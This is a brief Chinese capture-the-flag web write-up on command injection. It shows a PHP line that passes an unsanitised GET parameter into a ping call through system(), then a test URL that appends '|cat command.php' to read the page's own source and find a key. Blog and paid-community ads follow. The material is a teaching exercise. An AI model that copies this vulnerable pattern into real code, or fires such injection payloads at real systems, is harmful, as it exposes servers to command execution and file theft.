【CTF WEB】命令执行
命令执行
找到题目中的KEY
KEY为八位随机字符数字,例如key:1234qwer。提交1234qwer 即可。
漏洞代码
<?php
system("ping -c 2 ".$_GET['ip']);
?>
测试方法
http://localhost/command.php?ip=127.0.0.1|cat command.php
===========================================================
一个独立安全研究员,自由职业者的知识星球《公鸡队之家》,一边研究技术,一边分享到星球,一边养活自己,我们都有一颗好为人师的心,赠人玫瑰,手留余香。星球的价格是199¥/年。希望大家赏光,加入二维码在文末。
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步